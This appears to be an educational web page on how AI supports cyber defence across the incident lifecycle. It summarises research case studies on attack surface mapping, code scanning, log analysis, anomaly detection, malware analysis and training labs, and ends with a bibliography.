AI in Cyber Defence

How AI changes cyber defence across the cyber incident lifecycle

Cyber defence aims to protect systems, networks, and data against infiltration, disruption, or destruction. The cyber incident lifecycle provides a useful way to understand cyber defence, breaking it down into four phases:

  • Prevention: preventing and reducing the risk of incidents and minimising their potential effects.
  • Preparedness: developing plans, tools, and capabilities to support effective response.
  • Response: stemming the incident and preventing further damage.
  • Recovery: restoring operations quickly and returning to a normal or stronger level of security.

 

Artificial intelligence (AI) has become relevant across all four phases. Unlike traditional tools that fit neatly into one step, many AI capabilities cut across the lifecycle: the same technique that supports preparedness can also enable faster response or aid recovery. This integration makes AI both powerful and challenging to classify: its value lies not only in improving individual tasks but in linking the phases together more seamlessly.

Prevention

Preparedness

Response

Recovery

Attack surface mapping

Code scanning

Data summarisation

Data classification

Anomaly detection

Writing and analysis

Synthetic data

Identity and access management

Identity and access management

Log analysis

Malware analysis

Training and Labs

Training and Labs

In the sections that follow, we examine concrete AI applications for cyber defense, showing how they map onto different phases of the incident lifecycle and, in many cases, span several at once.

Attack surface mapping

Attack surface mapping identifies all the assets, entry points, and vulnerabilities an adversary could exploit in an attack. It provides defenders with visibility into their exposure and helps prioritise what to secure.

How AI changes attack surface mapping:

AI transforms attack surface mapping by automating large-scale scans of networks and assets, dramatically reducing manual effort. With advanced pattern recognition, it can detect hidden or forgotten endpoints that traditional methods often miss. AI systems can update maps continuously as infrastructures evolve, reducing blind spots and ensuring defenders maintain an accurate, real-time picture of their environment.
Prevention. Reduces exposures before attackers exploit them.
Preparedness. Maintains an updated view of infrastructure for incident planning.

Case Highlighted: Use of LLMs for asset discovery in critical infrastructure

In 2025, Luigi Coppolino et al published a study showing how large language models (LLMs) can improve the discovery of assets in critical infrastructures. Traditional tools such as Nmap or industrial security platforms either risk disrupting sensitive systems through active scans or fail to detect hidden devices when relying only on passive monitoring.

The researchers proposed an LLM-based “Mixture of Experts” framework that combines data from passive traffic observation, carefully limited active probing and physical signals such as electromagnetic emissions. Specialised LLM agents then interpret this data: one focuses on industrial protocols, another on vulnerabilities in IT/OT networks, and another on system architecture and dependencies.

The system can also draw on external intelligence sources (such as MITRE ATT&CK or CVE databases) to identify weaknesses and recommend security measures. In tests on a simulated industrial network, it successfully classified assets like programmable logic controllers, robotic arms, and printers, while flagging insecure practices such as unencrypted Modbus traffic.

Such an approach turns attack surface mapping into an adaptive and context-aware process that provides real-time visibility and reduces the risks of traditional scanning. By lowering the technical barriers for defenders, it enables more comprehensive monitoring and strengthens the overall security posture of critical infrastructure.

Further readings

Code scanning and evaluation

Code scanning reviews source code to detect vulnerabilities, insecure libraries, or poor security practices before they can be exploited.

How AI changes code scanning and evaluation:

AI accelerates vulnerability detection by highlighting insecure functions and identifying risky coding patterns learned from past exploits. It also offers automated remediation suggestions, supporting developers in writing more secure code and reducing the window of opportunity for attackers.

Prevention. Fixes weaknesses before attackers discover them.
Preparedness. Strengthens baseline security posture for incident readiness.

Case Highlighted: Use of LLMs for code scanning and secure development

In 2025, Belozerov et al investigated how large language models can support secure coding practices. Their study tested ChatGPT against the DevGPT dataset, which contained real developer code alongside known vulnerabilities flagged by static scanners. Out of 32 confirmed vulnerabilities, ChatGPT correctly detected 18 and even suggested fixes for 17 of them.

The results show how AI can reduce manual effort in code review, help triage risky coding patterns and provide automated remediation suggestions. This has the potential to scale secure coding practices and shorten the time window in which vulnerabilities remain exploitable.

At the same time, the study emphasised important limitations: ChatGPT occasionally produced overconfident but incorrect outputs, introduced new flaws when attempting fixes and was less reliable than static analysis or expert human review. A key takeaway from this study is that AI can be a powerful assistant in code evaluation, but only when combined with traditional tools and proper oversight.

Further readings

Data summarisation

Data summarisation condenses large volumes of technical data (e.g., logs, reports, and threat intelligence) into accessible insights.

How AI changes data summarisation:

AI reduces cognitive overload by transforming raw and unstructured information into actionable intelligence. It can identify recurring patterns or anomalies across fragmented datasets. It can also generate plain language reports for non-specialists. AI therefore makes information easier to consume, communicate, and act upon.

Preparedness. Helps digest threat intelligence and plan more effectively.
Response. Streamlines situational awareness in real time.
Recovery. Produces summaries and reports for lessons learned.

Case Highlighted: AI for log summarisation and situational awareness

In 2024, Balasubramanian et al introduced CYGENT, a conversational agent powered by GPT-3 that can analyse and summarise system logs. Instead of requiring analysts to sift through thousands of raw log entries, CYGENT condenses them into short, human-readable outputs that highlight key events and anomalies.

In evaluations, CYGENT outperformed other large language models in producing clear and actionable summaries. The system reduced cognitive overload, supported situational awareness during live incidents, and enabled faster decision-making.

This case illustrates how AI can transform raw, technical data into accessible intelligence. By making logs easier to interpret, it helps defenders prepare more effectively, respond more quickly, and recover with better documentation after incidents.

Further readings

Data classification

Data classification organises information according to its sensitivity or compliance requirements, ensuring that critical assets receive appropriate protection.

How AI changes data classification:

AI uses natural language processing to automatically tag sensitive content and detect misclassified or exposed data at scale.

Prevention. Reduces accidental exposure of sensitive data.
Preparedness. Supports compliance.

Case Highlighted: AI for sensitive data classification

In 2024, De Renzis et al investigated how large language models could be used to improve the classification of sensitive information. A central challenge in this area is that real personal data cannot always be used for training because of privacy risks. The authors proposed generating synthetic training data that still reflects the patterns of sensitive categories, such as health, politics, or religion.

Their approach enabled the training of accurate classifiers without exposing actual user data, demonstrating how AI can help organisations comply with regulations such as GDPR while scaling up their ability to detect and protect sensitive information. This case illustrates how AI strengthens both prevention (by reducing accidental data exposure) and preparedness (by supporting compliance frameworks). At the same time, it underlines the importance of governance and validation to ensure synthetic data and resulting models remain representative and reliable.

Further readings

Endpoint or network anomaly detection

Anomaly detection monitors endpoints and network traffic for unusual behaviours that may indicate compromise.

How AI changes endpoint and network anomaly detection:

AI learns what normal activity looks like and flags deviations that might signal malicious activity. Unlike signature-based systems, it can detect more subtle intrusions that evade traditional detection. AI enables faster and more effective incident response by prioritising alerts and reducing false positives.

Preparedness. Establishes baselines of normal activity.
Response. Detects anomalies in real time to flag and contain attacks.

Case Highlighted: Using AI for anomaly detection in critical systems

In 2024, Nwoye and Nwagwughiagwu examined how AI-driven anomaly detection could improve cyber defence across endpoints and networks. Using machine learning models trained on normal patterns of system behaviour and network traffic, their approach allowed them to identify subtle deviations that traditional, signature-based systems would miss, including for example early signs of insider threats and data breaches.

The study presented case examples from critical sectors, showing that AI-enabled anomaly detection reduced response times and helped maintain business continuity by flagging suspicious activity before it caused serious damage. The authors also acknowledged challenges, including false positives and the need for transparency in complex AI models. This case demonstrates how AI contributes to both preparedness (by establishing baselines of normal activity) and response (by detecting and prioritising anomalies in real time).

Further readings

General writing and data gathering/analysis tasks

Defensive operations also involve extensive writing, research, and data analysis to document incidents, inform decisions and train staff.

How AI changes general writing and data gathering or analysis tasks:

AI can draft reports, policies, and incident briefings, easing the administrative burden on analysts. It can automate open-source intelligence gathering for exercises, allowing students and professionals to focus on higher-level analysis and strategy instead of repetitive tasks.

Response. Supports rapid reporting and situational awareness.
Recovery. Enables thorough post incident documentation and lessons learned.

Case Highlighted: Automated intelligence gathering and reporting

In 2024, Gao et al introduced ThreatKG, an AI-powered system that automatically collects cyber threat intelligence from open sources, extracts key entities such as actors and vulnerabilities, and organises them into a structured knowledge graph. Instead of analysts manually reading through long, unstructured reports, the system provides a consolidated and searchable overview. This reduces the administrative burden of defensive operations, supports faster production of incident briefings, and improves situational awareness during active threats. By transforming fragmented information into accessible insights, ThreatKG allows staff to spend more time on interpretation and decision-making. The study illustrates how AI can reshape everyday defensive work by making intelligence gathering more efficient and actionable, while also highlighting the need for oversight to ensure accuracy and relevance.

Further readings

Generating synthetic data

Synthetic data generation creates artificial datasets for training, testing, or simulation without exposing sensitive real world information.

How AI changes generating synthetic data:

AI can produce realistic network traffic or malware samples for laboratory use, fill gaps where real-world data is unavailable, and safeguard privacy while enabling experimentation. This helps educators and defenders prepare for real incidents without risking sensitive data exposure.

Prevention. Enables safe experimentation without exposing sensitive information.
Preparedness. Supports training and simulation with realistic datasets.
Recovery. Recreates attack scenarios for post-incident testing and improvement.

Case Highlighted: Use of GANs for producing safe and realistic training data

In 2022, Nukavarapu et al developed MirageNet, a framework that uses generative adversarial networks (GANs) to create realistic synthetic network traffic. The system can replicate patterns of DNS traffic and other protocols in a way that closely resembles real-world data, but without exposing sensitive information from live networks.

This innovation is important because defenders and educators often need realistic data for training, testing, and experimentation, yet cannot always use operational traffic for privacy or security reasons. MirageNet enables safe simulations that prepare analysts for real attacks while avoiding disclosure risks. The use of AI, and in this case of GANs, allows for more secure and scalable experimentation. At the same time, it remains important to validate that synthetic data truly reflects real operational conditions, ensuring that training and testing remain reliable.

Further readings

Identity and access management (IAM)

Identity and access management (IAM) ensures that only authorised users have appropriate access to systems and resources.

How AI changes identity and access management:

AI strengthens IAM by detecting anomalous login patterns that may signal credential misuse, recommending adaptive authentication policies and automating routine checks. During incidents, it can rapidly flag compromised accounts and trigger stronger controls to contain threats.

Prevention. Enforces stronger authentication and reduces unauthorised access.
Response. Adapts in real time during suspected credential misuse.

Case Highlighted: Detection of unusual and inappropriate access

In 2024, Selling conducted a proof-of-concept study on applying AI to IAM systems. By integrating an anomaly detection model into a live IAM platform, the system was able to flag unusual login behaviour and inappropriate access privileges. This approach allows organisations to detect compromised accounts or insider misuse more quickly and to adapt authentication policies dynamically when risks are detected. The study found clear efficiency gains while emphasising the ongoing need for human oversight to interpret flagged anomalies and avoid unnecessary disruption. AI therefore allows to strengthen everyday access control and can turn IAM into a more adaptive and proactive line of defence.

Further readings

Log analysis

Log analysis examines system and security logs to detect, investigate and understand incidents.

How AI changes log analysis:

AI can process massive volumes of logs in real time, highlight unusual sequences of events, and generate concise summaries. This improves detection and allows for faster teaching and incident simulations.

Preparedness. Establishes baselines and identifies potential weak points.
Response. Accelerates investigation and supports incident handling in real time.
Recovery. Informs post-incident reviews and reporting.

Case Highlighted: AI agents for log parsing and threat pattern discovery

In 2025, Karaarslan et al examined how AI agents could support the analysis of the extensive logs generated by Cowrie honeypots. Honeypots deliberately imitate vulnerable systems to attract attackers, but the result is an overwhelming volume of raw data that is challenging for human analysts to interpret.

The researchers showed that AI agents can automatically parse and summarise these logs, extracting recurring attack patterns and generating concise reports. This automation reduces manual effort, enhances situational awareness, and allows defenders to detect trends and adjust security measures more rapidly. The study illustrates how AI can transform unmanageable datasets into actionable intelligence, while also underlining the need to validate outputs carefully so that evolving or deceptive adversarial tactics are not misread.

Further readings

Malware analysis

Malware analysis investigates malicious software to understand its behaviour, origin and potential impact.

How AI changes malware analysis:

AI speeds up classification by identifying code similarities across malware families and generating explanations of sandbox execution. It helps analysts quickly grasp how malware works, supporting faster response and more effective mitigations.

Response. Accelerates identification and containment of malware.
Recovery. Contributes to knowledge building for future defenses.

Case Highlighted: AI-assisted malware disassembly

In 2025, Apvrille and Nakov evaluated R2AI, an AI plugin for the Radare2 disassembler, on recent Linux and IoT malware samples. The system integrates LLMs into the reverse engineering process, helping analysts decompile functions, rename variables and identify suspicious behaviours. Their study showed that AI assistance could cut analysis time from several days to roughly half, while maintaining equal or better quality than human-only analysis. For example, in the case of the Linux/Devura malware, the AI correctly inferred argument formats that human analysts had missed. However, limitations remained: the models occasionally produced hallucinations, exaggerations, or omissions, and required constant validation by skilled experts. The findings suggest that AI-assisted disassembly is most effective as a force multiplier, accelerating triage and uncovering details more quickly, while still relying on human oversight to ensure accuracy and avoid misinterpretation.

Further readings

Training and labs

Training and labs provide controlled environments for hands-on cybersecurity exercises and simulations.

How AI changes training and labs:

AI can generate dynamic lab scenarios tailored to learner progress, create adaptive challenges of varying difficulty, and automate feedback and assessment. This supports more realistic and scalable training.

Preparedness. Strengthens readiness through adaptive simulations.
Recovery. Incorporates real incident lessons into training.

Case Highlighted: AI-powered cyber ranges for adaptive training

In 2025, Sisodiya et alintroduced an AI-powered cyber range designed to improve the realism and effectiveness of cybersecurity training. Unlike traditional static labs, the platform uses AI to adjust the difficulty of scenarios according to learner progress, inject realistic attack events, and provide automated feedback.

The study found that students trained in this environment achieved higher detection accuracy and reduced mitigation times compared with conventional approaches. For educators, the system makes it possible to scale exercises, personalise challenges, and incorporate lessons from real incidents into simulations.

Technically, the research also demonstrated that hybrid architectures, combining cloud scalability with the fidelity of physical systems, deliver more realistic and adaptive scenarios. The findings highlight how AI can transform training from fixed exercises into dynamic learning environments that better prepare students and professionals for real cyber threats.

Further readings

Discussion Questions

Bibliography

Alzu’bi, Ahmad, Omar Darwish, Amjad Albashayreh, and Yahya Tashtoush. ‘Cyberattack Event Logs Classification Using Deep Learning with Semantic Feature Analysis’. Computers & Security 150 (March 2025): 104222. https://doi.org/10.1016/j.cose.2024.104222. 

Ammara, Dure Adan, Jianguo Ding, and Kurt Tutschku. ‘Synthetic Network Traffic Data Generation: A Comparative Study’. arXiv:2410.16326. Version 2. Preprint, arXiv, 22 February 2025. https://doi.org/10.48550/arXiv.2410.16326. 

Balasubramanian, Prasasthy, Justin Seby, and Panos Kostakos. ‘CYGENT: A Cybersecurity Conversational Agent with Log Summarization Powered by GPT-3’. arXiv:2403.17160. Preprint, arXiv, 25 March 2024. https://doi.org/10.48550/arXiv.2403.17160. 

Coppolino, Luigi, Antonio Iannaccone, Roberto Nardone, and Alfredo Petruolo. ‘Asset Discovery in Critical Infrastructures: An LLM-Based Approach’. Electronics 14, no. 16 (2025): 3267. https://doi.org/10.3390/electronics14163267. 

Gao, Peng, Xiaoyuan Liu, Edward Choi, Sibo Ma, Xinyu Yang, and Dawn Song. ‘ThreatKG: An AI-Powered System for Automated Open-Source Cyber Threat Intelligence Gathering and Management’. arXiv:2212.10388. Preprint, arXiv, 30 October 2024. https://doi.org/10.48550/arXiv.2212.10388. 

Geiger, Alexander, Dongyu Liu, Sarah Alnegheimish, Alfredo Cuesta-Infante, and Kalyan Veeramachaneni. ‘TadGAN: Time Series Anomaly Detection Using Generative Adversarial Networks’. arXiv:2009.07769. Preprint, arXiv, 14 November 2020. https://doi.org/10.48550/arXiv.2009.07769. 

Ghioni, Riccardo, Mariarosaria Taddeo, and Luciano Floridi. ‘Open Source Intelligence and AI: A Systematic Review of the GELSI Literature’. Ai & Society, 28 January 2023, 1–16. https://doi.org/10.1007/s00146-023-01628-x. 

Humran, Hael Abdulhakim Ali, and Ferdi Sonmez. ‘Code Vulnerability Detection Across Different Programming Languages with AI Models’. arXiv:2508.11710. Preprint, arXiv, 14 August 2025. https://doi.org/10.48550/arXiv.2508.11710. 

Karaarslan, Enis, Esin Güler, Efe Emir Yüce, and Cagatay Coban. ‘Towards Log Analysis with AI Agents: Cowrie Case Study’. arXiv:2509.05306. Preprint, arXiv, 22 August 2025. https://doi.org/10.48550/arXiv.2509.05306. 

Nebebe, Betelhem, Pavlina Kröckel, Romarick Yatagha, Natasha Edeh, and Karl Waedt. ‘AI Defenders: Machine Learning Driven Anomaly Detection in Critical Infrastructures’. Gesellschaft für Informatik e.V., 2024, 1917–27. https://dl.gi.de/handle/20.500.12116/45143. 

Nukavarapu, Santosh Kumar, Mohammed Ayyat, and Tamer Nadeem. ‘MirageNet – Towards a GAN-Based Framework for Synthetic Network Traffic Generation’. GLOBECOM 2022 – 2022 IEEE Global Communications Conference, IEEE, 4 December 2022, 3089–95. https://doi.org/10.1109/GLOBECOM48099.2022.10001494. 

Nwoye, Chukwujekwu Charles, and Stephen Nwagwughiagwu. ‘AI-Driven Anomaly Detection for Proactive Cybersecurity and Data Breach Prevention’. International Journal of Engineering Technology Research & Management 8, no. 11 (2024): 339–56. 

Ogundairo, Obaloluwa, and Peter Broklyn. Natural Language Processing for Cybersecurity Incident Analysis. 2024. 

Peng, Wei, Junmei Ding, Wei Wang, et al. ‘CTISum: A New Benchmark Dataset For Cyber Threat Intelligence Summarization’. arXiv:2408.06576. Preprint, arXiv, 30 June 2025. https://doi.org/10.48550/arXiv.2408.06576. 

Perrina, Filippo, Francesco Marchiori, Mauro Conti, and Nino Vincenzo Verde. ‘AGIR: Automating Cyber Threat Intelligence Reporting with Natural Language Generation’. arXiv:2310.02655. Preprint, arXiv, 4 October 2023. https://doi.org/10.48550/arXiv.2310.02655. 

Petrolini, Michael, Stefano Cagnoni, and Monica Mordonini. ‘Automatic Detection of Sensitive Data Using Transformer- Based Classifiers’. Future Internet 14, no. 8 (2022): 228. https://doi.org/10.3390/fi14080228. 

Rani, Nanda, Bikash Saha, Vikas Maurya, and Sandeep Kumar Shukla. ‘TTPXHunter: Actionable Threat Intelligence Extraction as TTPs from Finished Cyber Threat Reports’. Digital Threats: Research and Practice 5, no. 4 (2024): 1–19. https://doi.org/10.1145/3696427. 

Rodriguez, David, Sarah Lee, Joshua Wilson, and Sadis Bello. AI-Powered IAM Audit for Anomaly Detection in Critical Infrastructure. 18 April 2025. 

Selling, Felix. ‘Advancing Identity and Access Management with Artificial Intelligence for Anomaly Detection: A Proof of Concept Implementation Study’. 2024. 

Xu, Shengzhe, Manish Marwah, Martin Arlitt, and Naren Ramakrishnan. ‘STAN: Synthetic Network Traffic Generation with Generative Neural Models’. arXiv:2009.12740. Preprint, arXiv, 3 August 2021. https://doi.org/10.48550/arXiv.2009.12740. 

Yang, Ziqi, and Zhenkai Liang. ‘Automated Identification of Sensitive Data from Implicit User Specification’. Cybersecurity 1, no. 1 (2018): 13. https://doi.org/10.1186/s42400-018-0011-x.

Thank you for signing up to our newsletter!

Thank you! RSVP received for AI in cyber defence

AI in cyber defence

Loading...

Loading…